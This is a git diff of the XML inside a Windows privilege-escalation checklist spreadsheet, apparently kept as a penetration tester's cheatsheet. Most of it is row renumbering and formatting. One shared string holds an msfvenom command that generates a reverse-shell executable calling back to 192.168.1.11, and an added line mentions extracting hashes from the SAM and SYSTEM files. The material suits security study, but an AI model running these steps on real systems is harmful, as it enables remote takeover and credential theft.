     <row r="157" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
       <c r="B157" s="33"/>
     </row>
-    <row r="158" spans="1:4" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="A158" s="5" t="s">
+    <row r="158" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="B158" s="33"/>
+    </row>
+    <row r="159" spans="1:4" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
+      <c r="A159" s="5" t="s">
         <v>109</v>
       </c>
-      <c r="B158" s="33"/>
-    </row>
-    <row r="159" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="B159" s="23" t="s">
+      <c r="B159" s="33"/>
+    </row>
+    <row r="160" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="B160" s="23" t="s">
+        <v>199</v>
+      </c>
+      <c r="C160" s="20" t="s">
+        <v>215</v>
+      </c>
+      <c r="D160" s="12"/>
+    </row>
+    <row r="161" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="B161" s="24" t="s">
+        <v>216</v>
+      </c>
+      <c r="C161" s="21" t="s">
+        <v>214</v>
+      </c>
+      <c r="D161" s="13" t="s">
+        <v>202</v>
+      </c>
+    </row>
+    <row r="162" spans="1:4" ht="90.75" thickBot="1" x14ac:dyDescent="0.3">
+      <c r="B162" s="25" t="s">
+        <v>217</v>
+      </c>
+      <c r="C162" s="22" t="s">
         <v>200</v>
       </c>
-      <c r="C159" s="20" t="s">
-        <v>216</v>
-      </c>
-      <c r="D159" s="12"/>
-    </row>
-    <row r="160" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="B160" s="24" t="s">
-        <v>217</v>
-      </c>
-      <c r="C160" s="21" t="s">
-        <v>215</v>
-      </c>
-      <c r="D160" s="13" t="s">
-        <v>203</v>
-      </c>
-    </row>
-    <row r="161" spans="1:4" ht="90.75" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="B161" s="25" t="s">
-        <v>218</v>
-      </c>
-      <c r="C161" s="22" t="s">
+      <c r="D162" s="14" t="s">
         <v>201</v>
       </c>
-      <c r="D161" s="14" t="s">
-        <v>202</v>
-      </c>
-    </row>
-    <row r="162" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="B162" s="33"/>
     </row>
     <row r="163" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
       <c r="B163" s="33"/>
     </row>
-    <row r="164" spans="1:4" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="A164" s="5" t="s">
+    <row r="164" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="B164" s="33"/>
+    </row>
+    <row r="165" spans="1:4" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
+      <c r="A165" s="5" t="s">
         <v>110</v>
       </c>
-      <c r="B164" s="33"/>
-    </row>
-    <row r="165" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="B165" s="23" t="s">
+      <c r="B165" s="33"/>
+    </row>
+    <row r="166" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="B166" s="23" t="s">
         <v>112</v>
       </c>
-      <c r="C165" s="20" t="s">
+      <c r="C166" s="20" t="s">
         <v>113</v>
       </c>
-      <c r="D165" s="12"/>
-    </row>
-    <row r="166" spans="1:4" ht="30" x14ac:dyDescent="0.25">
-      <c r="B166" s="24" t="s">
-        <v>237</v>
-      </c>
-      <c r="C166" s="21" t="s">
+      <c r="D166" s="12"/>
+    </row>
+    <row r="167" spans="1:4" ht="30" x14ac:dyDescent="0.25">
+      <c r="B167" s="24" t="s">
+        <v>234</v>
+      </c>
+      <c r="C167" s="21" t="s">
         <v>114</v>
       </c>
-      <c r="D166" s="13" t="s">
+      <c r="D167" s="13" t="s">
         <v>115</v>
       </c>
     </row>
-    <row r="167" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="B167" s="24"/>
-      <c r="C167" s="44" t="s">
+    <row r="168" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="B168" s="24"/>
+      <c r="C168" s="44" t="s">
         <v>111</v>
       </c>
-      <c r="D167" s="13" t="s">
+      <c r="D168" s="13" t="s">
         <v>116</v>
       </c>
     </row>
-    <row r="168" spans="1:4" ht="30" x14ac:dyDescent="0.25">
-      <c r="B168" s="24" t="s">
-        <v>238</v>
-      </c>
-      <c r="C168" s="21" t="s">
-        <v>236</v>
-      </c>
-      <c r="D168" s="13"/>
-    </row>
-    <row r="169" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
+    <row r="169" spans="1:4" ht="30" x14ac:dyDescent="0.25">
       <c r="B169" s="24" t="s">
+        <v>235</v>
+      </c>
+      <c r="C169" s="21" t="s">
+        <v>245</v>
+      </c>
+      <c r="D169" s="13"/>
+    </row>
+    <row r="170" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="B170" s="24" t="s">
         <v>119</v>
       </c>
-      <c r="C169" s="21" t="s">
+      <c r="C170" s="21" t="s">
         <v>117</v>
       </c>
-      <c r="D169" s="13" t="s">
+      <c r="D170" s="63" t="s">
         <v>118</v>
       </c>
     </row>
-    <row r="170" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="B170" s="24"/>
-      <c r="C170" s="21"/>
-      <c r="D170" s="13"/>
-    </row>
     <row r="171" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="B171" s="24" t="s">
+      <c r="B171" s="24"/>
+      <c r="C171" s="21"/>
+      <c r="D171" s="13"/>
+    </row>
+    <row r="172" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="B172" s="24" t="s">
         <v>120</v>
       </c>
-      <c r="C171" s="21" t="s">
+      <c r="C172" s="21" t="s">
         <v>121</v>
       </c>
-      <c r="D171" s="13" t="s">
+      <c r="D172" s="13" t="s">
         <v>122</v>
       </c>
     </row>
-    <row r="172" spans="1:4" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="B172" s="25"/>
-      <c r="C172" s="22" t="s">
+    <row r="173" spans="1:4" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
+      <c r="B173" s="25"/>
+      <c r="C173" s="22" t="s">
         <v>123</v>
       </c>
-      <c r="D172" s="14" t="s">
+      <c r="D173" s="14" t="s">
         <v>116</v>
       </c>
-    </row>
-    <row r="173" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="B173" s="33"/>
     </row>
     <row r="174" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
       <c r="B174" s="33"/>
     </row>
-    <row r="175" spans="1:4" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="A175" s="5" t="s">
+    <row r="175" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="B175" s="33"/>
+    </row>
+    <row r="176" spans="1:4" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
+      <c r="A176" s="5" t="s">
+        <v>218</v>
+      </c>
+      <c r="B176" s="33"/>
+    </row>
+    <row r="177" spans="1:4" ht="30" x14ac:dyDescent="0.25">
+      <c r="B177" s="23" t="s">
+        <v>210</v>
+      </c>
+      <c r="C177" s="20" t="s">
+        <v>211</v>
+      </c>
+      <c r="D177" s="12" t="s">
         <v>219</v>
       </c>
-      <c r="B175" s="33"/>
-    </row>
-    <row r="176" spans="1:4" ht="30" x14ac:dyDescent="0.25">
-      <c r="B176" s="23" t="s">
-        <v>211</v>
-      </c>
-      <c r="C176" s="20" t="s">
+    </row>
+    <row r="178" spans="1:4" ht="30" x14ac:dyDescent="0.25">
+      <c r="B178" s="24"/>
+      <c r="C178" s="21" t="s">
+        <v>268</v>
+      </c>
+      <c r="D178" s="13" t="s">
+        <v>267</v>
+      </c>
+    </row>
+    <row r="179" spans="1:4" ht="30" x14ac:dyDescent="0.25">
+      <c r="B179" s="24"/>
+      <c r="C179" s="21" t="s">
+        <v>243</v>
+      </c>
+      <c r="D179" s="13" t="s">
+        <v>244</v>
+      </c>
+    </row>
+    <row r="180" spans="1:4" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
+      <c r="B180" s="25" t="s">
         <v>212</v>
       </c>
-      <c r="D176" s="12" t="s">
-        <v>220</v>
-      </c>
-    </row>
-    <row r="177" spans="1:4" ht="30" x14ac:dyDescent="0.25">
-      <c r="B177" s="24"/>
-      <c r="C177" s="21" t="s">
-        <v>246</v>
-      </c>
-      <c r="D177" s="13" t="s">
-        <v>247</v>
-      </c>
-    </row>
-    <row r="178" spans="1:4" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="B178" s="25" t="s">
+      <c r="C180" s="22" t="s">
         <v>213</v>
       </c>
-      <c r="C178" s="22" t="s">
-        <v>214</v>
-      </c>
-      <c r="D178" s="14"/>
-    </row>
-    <row r="179" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="B179" s="33"/>
-      <c r="C179" s="9"/>
-      <c r="D179" s="9"/>
-    </row>
-    <row r="180" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="B180" s="33"/>
-    </row>
-    <row r="181" spans="1:4" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="A181" s="5" t="s">
-        <v>243</v>
-      </c>
+      <c r="D180" s="14"/>
+    </row>
+    <row r="181" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
       <c r="B181" s="33"/>
+      <c r="C181" s="9"/>
+      <c r="D181" s="9"/>
     </row>
     <row r="182" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="B182" s="23" t="s">
-        <v>244</v>
-      </c>
-      <c r="C182" s="20" t="s">
-        <v>245</v>
-      </c>
-      <c r="D182" s="12" t="s">
-        <v>220</v>
-      </c>
-    </row>
-    <row r="183" spans="1:4" ht="30" x14ac:dyDescent="0.25">
-      <c r="B183" s="24" t="s">
+      <c r="B182" s="33"/>
+    </row>
+    <row r="183" spans="1:4" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
+      <c r="A183" s="5" t="s">
+        <v>240</v>
+      </c>
+      <c r="B183" s="33"/>
+    </row>
+    <row r="184" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="B184" s="23" t="s">
+        <v>241</v>
+      </c>
+      <c r="C184" s="20" t="s">
+        <v>242</v>
+      </c>
+      <c r="D184" s="12" t="s">
+        <v>219</v>
+      </c>
+    </row>
+    <row r="185" spans="1:4" ht="30" x14ac:dyDescent="0.25">
+      <c r="B185" s="24" t="s">
+        <v>236</v>
+      </c>
+      <c r="C185" s="21" t="s">
+        <v>237</v>
+      </c>
+      <c r="D185" s="13"/>
+    </row>
+    <row r="186" spans="1:4" ht="30" x14ac:dyDescent="0.25">
+      <c r="B186" s="24" t="s">
         <v>239</v>
       </c>
-      <c r="C183" s="21" t="s">
-        <v>240</v>
-      </c>
-      <c r="D183" s="13"/>
-    </row>
-    <row r="184" spans="1:4" ht="30" x14ac:dyDescent="0.25">
-      <c r="B184" s="24" t="s">
-        <v>242</v>
-      </c>
-      <c r="C184" s="21" t="s">
-        <v>241</v>
-      </c>
-      <c r="D184" s="13"/>
-    </row>
-    <row r="185" spans="1:4" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="B185" s="25"/>
-      <c r="C185" s="22"/>
-      <c r="D185" s="14"/>
-    </row>
-    <row r="186" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="B186" s="33"/>
-      <c r="C186" s="46"/>
-      <c r="D186" s="46"/>
-    </row>
-    <row r="187" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="B187" s="33"/>
+      <c r="C186" s="21" t="s">
+        <v>238</v>
+      </c>
+      <c r="D186" s="13"/>
+    </row>
+    <row r="187" spans="1:4" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
+      <c r="B187" s="25"/>
+      <c r="C187" s="22"/>
+      <c r="D187" s="14"/>
     </row>
     <row r="188" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
       <c r="B188" s="33"/>
+      <c r="C188" s="46"/>
+      <c r="D188" s="46"/>
     </row>
     <row r="189" spans="1:4" ht="15.75" x14ac:dyDescent="0.25">
       <c r="B189" s="33"/>
@@ -3339,33 +3469,33 @@
       <c r="B195" s="33"/>
     </row>
     <row r="196" spans="2:4" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="B196" s="45" t="s">
-        <v>221</v>
-      </c>
-      <c r="C196" s="64" t="s">
-        <v>222</v>
-      </c>
-      <c r="D196" s="65"/>
+      <c r="B196" s="33"/>
     </row>
     <row r="197" spans="2:4" ht="15.75" x14ac:dyDescent="0.25">
       <c r="B197" s="33"/>
-      <c r="C197" s="64" t="s">
-        <v>223</v>
-      </c>
-      <c r="D197" s="65"/>
     </row>
     <row r="198" spans="2:4" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="B198" s="33"/>
-      <c r="C198" s="64" t="s">
-        <v>224</v>
-      </c>
-      <c r="D198" s="65"/>
+      <c r="B198" s="45" t="s">
+        <v>220</v>
+      </c>
+      <c r="C198" s="68" t="s">
+        <v>221</v>
+      </c>
+      <c r="D198" s="69"/>
     </row>
     <row r="199" spans="2:4" ht="15.75" x14ac:dyDescent="0.25">
       <c r="B199" s="33"/>
+      <c r="C199" s="68" t="s">
+        <v>222</v>
+      </c>
+      <c r="D199" s="69"/>
     </row>
     <row r="200" spans="2:4" ht="15.75" x14ac:dyDescent="0.25">
       <c r="B200" s="33"/>
+      <c r="C200" s="68" t="s">
+        <v>223</v>
+      </c>
+      <c r="D200" s="69"/>
     </row>
     <row r="201" spans="2:4" ht="15.75" x14ac:dyDescent="0.25">
       <c r="B201" s="33"/>
@@ -3811,29 +3941,200 @@
     <row r="348" spans="2:2" ht="15.75" x14ac:dyDescent="0.25">
       <c r="B348" s="33"/>
     </row>
+    <row r="349" spans="2:2" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="B349" s="33"/>
+    </row>
+    <row r="350" spans="2:2" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="B350" s="33"/>
+    </row>
   </sheetData>
   <mergeCells count="9">
-    <mergeCell ref="D86:D87"/>
-    <mergeCell ref="C196:D196"/>
-    <mergeCell ref="C197:D197"/>
+    <mergeCell ref="D87:D88"/>
     <mergeCell ref="C198:D198"/>
-    <mergeCell ref="B9:C9"/>
-    <mergeCell ref="B57:C57"/>
-    <mergeCell ref="B65:C65"/>
-    <mergeCell ref="D67:D68"/>
-    <mergeCell ref="B73:C73"/>
+    <mergeCell ref="C199:D199"/>
+    <mergeCell ref="C200:D200"/>
+    <mergeCell ref="B10:C10"/>
+    <mergeCell ref="B58:C58"/>
+    <mergeCell ref="B66:C66"/>
+    <mergeCell ref="D68:D69"/>
+    <mergeCell ref="B74:C74"/>
   </mergeCells>
   <hyperlinks>
-    <hyperlink ref="C121" r:id="rId1" xr:uid="{63239020-19E5-487A-A3DC-C47747D53AF1}"/>
-    <hyperlink ref="D48" r:id="rId2" location="EoP%201:%20Incorrect%20permissions%20in%20services" xr:uid="{67F3383A-7F2D-43AD-A9E8-6E6AA95BFBA9}"/>
-    <hyperlink ref="C167" r:id="rId3" xr:uid="{4E1D8F2C-FF4E-4F0F-91B9-C458E84BC614}"/>
-    <hyperlink ref="D141" r:id="rId4" xr:uid="{E3DCE501-F148-4DF2-AA9E-0F42EA266F64}"/>
-    <hyperlink ref="C148" r:id="rId5" xr:uid="{79722A47-85E7-430B-B277-CF6F8EE2BD56}"/>
-    <hyperlink ref="C196" r:id="rId6" location="EoP%201:%20Incorrect%20permissions%20in%20services " xr:uid="{84AB6242-C933-4DD8-9978-8A75CCE67969}"/>
-    <hyperlink ref="C197" r:id="rId7" xr:uid="{062BC404-FAA1-419F-8F76-EB17642556BA}"/>
-    <hyperlink ref="C198" r:id="rId8" xr:uid="{AD2CC05A-0F22-44FE-8506-7F673229F0BF}"/>
+    <hyperlink ref="C122" r:id="rId1" xr:uid="{63239020-19E5-487A-A3DC-C47747D53AF1}"/>
+    <hyperlink ref="D49" r:id="rId2" location="EoP%201:%20Incorrect%20permissions%20in%20services" xr:uid="{67F3383A-7F2D-43AD-A9E8-6E6AA95BFBA9}"/>
+    <hyperlink ref="C168" r:id="rId3" xr:uid="{4E1D8F2C-FF4E-4F0F-91B9-C458E84BC614}"/>
+    <hyperlink ref="D142" r:id="rId4" xr:uid="{E3DCE501-F148-4DF2-AA9E-0F42EA266F64}"/>
+    <hyperlink ref="C149" r:id="rId5" xr:uid="{79722A47-85E7-430B-B277-CF6F8EE2BD56}"/>
+    <hyperlink ref="C198" r:id="rId6" location="EoP%201:%20Incorrect%20permissions%20in%20services " xr:uid="{84AB6242-C933-4DD8-9978-8A75CCE67969}"/>
+    <hyperlink ref="C199" r:id="rId7" xr:uid="{062BC404-FAA1-419F-8F76-EB17642556BA}"/>
+    <hyperlink ref="C200" r:id="rId8" xr:uid="{AD2CC05A-0F22-44FE-8506-7F673229F0BF}"/>
+    <hyperlink ref="D170" r:id="rId9" xr:uid="{59E40DA7-FC2E-43AD-A762-64E1009D19F0}"/>
   </hyperlinks>
   <pageMargins left="0.25" right="0.25" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
-  <pageSetup paperSize="8" orientation="landscape" r:id="rId9"/>
+  <pageSetup paperSize="8" orientation="landscape" r:id="rId10"/>
+</worksheet>
+</file>
+
+<file path=xl/worksheets/sheet2.xml><?xml version="1.0" encoding="utf-8"?>
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{BF7B5C1C-B74B-4EDB-BFB4-CDE6DDF3A48D}">
+  <dimension ref="B2:E18"/>
+  <sheetViews>
+    <sheetView showGridLines="0" workbookViewId="0">
+      <selection activeCell="D9" sqref="D9"/>
+    </sheetView>
+  </sheetViews>
+  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
+  <cols>
+    <col min="2" max="2" width="13.140625" bestFit="1" customWidth="1"/>
+    <col min="3" max="3" width="13.42578125" bestFit="1" customWidth="1"/>
+    <col min="4" max="4" width="16.7109375" customWidth="1"/>
+    <col min="5" max="5" width="95.42578125" bestFit="1" customWidth="1"/>
+  </cols>
+  <sheetData>
+    <row r="2" spans="2:5" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="B2" s="6" t="s">
+        <v>247</v>
+      </c>
+      <c r="C2" s="6" t="s">
+        <v>248</v>
+      </c>
+      <c r="D2" s="6" t="s">
+        <v>250</v>
+      </c>
+      <c r="E2" s="6" t="s">
+        <v>256</v>
+      </c>
+    </row>
+    <row r="3" spans="2:5" x14ac:dyDescent="0.25">
+      <c r="B3" s="61" t="s">
+        <v>249</v>
+      </c>
+      <c r="C3" s="61" t="s">
+        <v>246</v>
+      </c>
+      <c r="D3" s="61" t="s">
+        <v>254</v>
+      </c>
+      <c r="E3" s="62" t="s">
+        <v>251</v>
+      </c>
+    </row>
+    <row r="4" spans="2:5" x14ac:dyDescent="0.25">
+      <c r="B4" s="61" t="s">
+        <v>252</v>
+      </c>
+      <c r="C4" s="61" t="s">
+        <v>253</v>
+      </c>
+      <c r="D4" s="61" t="s">
+        <v>254</v>
+      </c>
+    </row>
+    <row r="5" spans="2:5" x14ac:dyDescent="0.25">
+      <c r="B5" s="61" t="s">
+        <v>249</v>
+      </c>
+      <c r="C5" s="61" t="s">
+        <v>255</v>
+      </c>
+      <c r="D5" s="61" t="s">
+        <v>254</v>
+      </c>
+      <c r="E5" s="62" t="s">
+        <v>257</v>
+      </c>
+    </row>
+    <row r="6" spans="2:5" x14ac:dyDescent="0.25">
+      <c r="B6" s="61" t="s">
+        <v>249</v>
+      </c>
+      <c r="C6" s="61" t="s">
+        <v>258</v>
+      </c>
+      <c r="D6" s="61" t="s">
+        <v>254</v>
+      </c>
+      <c r="E6" s="62" t="s">
+        <v>259</v>
+      </c>
+    </row>
+    <row r="7" spans="2:5" x14ac:dyDescent="0.25">
+      <c r="B7" s="61" t="s">
+        <v>249</v>
+      </c>
+      <c r="C7" s="64" t="s">
+        <v>253</v>
+      </c>
+      <c r="D7" s="61" t="s">
+        <v>261</v>
+      </c>
+      <c r="E7" s="62" t="s">
+        <v>260</v>
+      </c>
+    </row>
+    <row r="8" spans="2:5" x14ac:dyDescent="0.25">
+      <c r="B8" s="61"/>
+      <c r="C8" s="61"/>
+      <c r="D8" s="61"/>
+    </row>
+    <row r="9" spans="2:5" x14ac:dyDescent="0.25">
+      <c r="B9" s="61"/>
+      <c r="C9" s="61"/>
+      <c r="D9" s="61"/>
+    </row>
+    <row r="10" spans="2:5" x14ac:dyDescent="0.25">
+      <c r="B10" s="61"/>
+      <c r="C10" s="61"/>
+      <c r="D10" s="61"/>
+    </row>
+    <row r="11" spans="2:5" x14ac:dyDescent="0.25">
+      <c r="B11" s="61"/>
+      <c r="C11" s="61"/>
+      <c r="D11" s="61"/>
+    </row>
+    <row r="12" spans="2:5" x14ac:dyDescent="0.25">
+      <c r="B12" s="61"/>
+      <c r="C12" s="61"/>
+      <c r="D12" s="61"/>
+    </row>
+    <row r="13" spans="2:5" x14ac:dyDescent="0.25">
+      <c r="B13" s="61"/>
+      <c r="C13" s="61"/>
+      <c r="D13" s="61"/>
+    </row>
+    <row r="14" spans="2:5" x14ac:dyDescent="0.25">
+      <c r="B14" s="61"/>
+      <c r="C14" s="61"/>
+      <c r="D14" s="61"/>
+    </row>
+    <row r="15" spans="2:5" x14ac:dyDescent="0.25">
+      <c r="B15" s="61"/>
+      <c r="C15" s="61"/>
+      <c r="D15" s="61"/>
+    </row>
+    <row r="16" spans="2:5" x14ac:dyDescent="0.25">
+      <c r="B16" s="61"/>
+      <c r="C16" s="61"/>
+      <c r="D16" s="61"/>
+    </row>
+    <row r="17" spans="2:4" x14ac:dyDescent="0.25">
+      <c r="B17" s="61"/>
+      <c r="C17" s="61"/>
+      <c r="D17" s="61"/>
+    </row>
+    <row r="18" spans="2:4" x14ac:dyDescent="0.25">
+      <c r="B18" s="61"/>
+      <c r="C18" s="61"/>
+      <c r="D18" s="61"/>
+    </row>
+  </sheetData>
+  <hyperlinks>
+    <hyperlink ref="E3" r:id="rId1" xr:uid="{5D8A51B4-D614-4E1C-A9B2-01388BB9873D}"/>
+    <hyperlink ref="E5" r:id="rId2" xr:uid="{3D906E19-FA7C-4575-8891-CC5C717FF90E}"/>
+    <hyperlink ref="E6" r:id="rId3" xr:uid="{9A334378-DED9-4DA4-AC4A-F57D810675E3}"/>
+    <hyperlink ref="E7" r:id="rId4" xr:uid="{CE6DF4FD-8692-4490-9E90-F464953F549A}"/>
+  </hyperlinks>
+  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
+  <pageSetup orientation="portrait" r:id="rId5"/>
 </worksheet>
 </file>
--- a/Windows_Priv_checklist.xlsx
+++ b/Windows_Priv_checklist.xlsx
@@ -8,7 +8,7 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\ashwi\Documents\Cheatsheets\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{D58D7367-98D6-423D-9B95-3FDAF7597B8D}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{6460E889-BE22-42F9-99DD-9F084139C9B9}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11310" xr2:uid="{6963620D-4442-470F-924A-CBD2F3504823}"/>
   </bookViews>
@@ -32,7 +32,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="305" uniqueCount="269">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="307" uniqueCount="271">
   <si>
     <t>Checks</t>
   </si>
@@ -284,9 +284,6 @@
     <t>Unquoted Service Path</t>
   </si>
   <si>
-    <t>to check the permission of the server - start/stop, bin path/config change, other sets for User</t>
-  </si>
-  <si>
     <t>all user to check the permission</t>
   </si>
   <si>
@@ -908,6 +905,38 @@
   <si>
     <t>msfvenom -p windows/shell_reverse_tcp
 LHOST=192.168.1.11 LPORT=53 -f exe -o reverse.exe</t>
+  </si>
+  <si>
+    <r>
+      <t>to check the</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="11"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve"> permission of the service</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="11"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve"> - start/stop, bin path/config change, other sets for User</t>
+    </r>
+  </si>
+  <si>
+    <t>Check the service can be start or autostart.</t>
+  </si>
+  <si>
+    <t>get the Hash value form sam and sytem</t>
   </si>
 </sst>
 </file>
@@ -1892,8 +1921,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{C981E414-9B54-4DB2-AC86-B1519AF622DB}">
   <dimension ref="A2:J350"/>
   <sheetViews>
-    <sheetView showGridLines="0" tabSelected="1" topLeftCell="A170" zoomScaleNormal="100" workbookViewId="0">
-      <selection activeCell="C178" sqref="C178"/>
+    <sheetView showGridLines="0" tabSelected="1" topLeftCell="A95" zoomScale="90" zoomScaleNormal="90" workbookViewId="0">
+      <selection activeCell="D101" sqref="D101"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -1906,64 +1935,64 @@
   <sheetData>
     <row r="2" spans="1:5" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A2" s="51" t="s">
+        <v>230</v>
+      </c>
+      <c r="B2" s="52" t="s">
         <v>231</v>
       </c>
-      <c r="B2" s="52" t="s">
-        <v>232</v>
-      </c>
       <c r="C2" s="53" t="s">
-        <v>232</v>
+        <v>231</v>
       </c>
       <c r="D2" s="54"/>
     </row>
     <row r="3" spans="1:5" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A3" s="55" t="s">
+        <v>228</v>
+      </c>
+      <c r="B3" s="47" t="s">
         <v>229</v>
-      </c>
-      <c r="B3" s="47" t="s">
-        <v>230</v>
       </c>
       <c r="C3" s="49"/>
       <c r="D3" s="56"/>
     </row>
     <row r="4" spans="1:5" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A4" s="59" t="s">
+        <v>224</v>
+      </c>
+      <c r="B4" s="47" t="s">
         <v>225</v>
       </c>
-      <c r="B4" s="47" t="s">
+      <c r="C4" s="48" t="s">
         <v>226</v>
       </c>
-      <c r="C4" s="48" t="s">
-        <v>227</v>
-      </c>
       <c r="D4" s="57" t="s">
-        <v>262</v>
+        <v>261</v>
       </c>
     </row>
     <row r="5" spans="1:5" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A5" s="59" t="s">
-        <v>224</v>
+        <v>223</v>
       </c>
       <c r="B5" s="47" t="s">
-        <v>228</v>
+        <v>227</v>
       </c>
       <c r="C5" s="49"/>
       <c r="D5" s="57" t="s">
-        <v>262</v>
+        <v>261</v>
       </c>
     </row>
     <row r="6" spans="1:5" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A6" s="60" t="s">
+        <v>262</v>
+      </c>
+      <c r="B6" s="50" t="s">
+        <v>264</v>
+      </c>
+      <c r="C6" s="65" t="s">
         <v>263</v>
       </c>
-      <c r="B6" s="50" t="s">
-        <v>265</v>
-      </c>
-      <c r="C6" s="65" t="s">
-        <v>264</v>
-      </c>
       <c r="D6" s="58" t="s">
-        <v>262</v>
+        <v>261</v>
       </c>
     </row>
     <row r="8" spans="1:5" ht="15.75" x14ac:dyDescent="0.25">
@@ -1992,7 +2021,7 @@
         <v>2</v>
       </c>
       <c r="B10" s="70" t="s">
-        <v>135</v>
+        <v>134</v>
       </c>
       <c r="C10" s="71"/>
       <c r="D10" s="32"/>
@@ -2045,10 +2074,10 @@
     <row r="15" spans="1:5" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A15" s="8"/>
       <c r="B15" s="24" t="s">
-        <v>204</v>
+        <v>203</v>
       </c>
       <c r="C15" s="21" t="s">
-        <v>203</v>
+        <v>202</v>
       </c>
       <c r="D15" s="13"/>
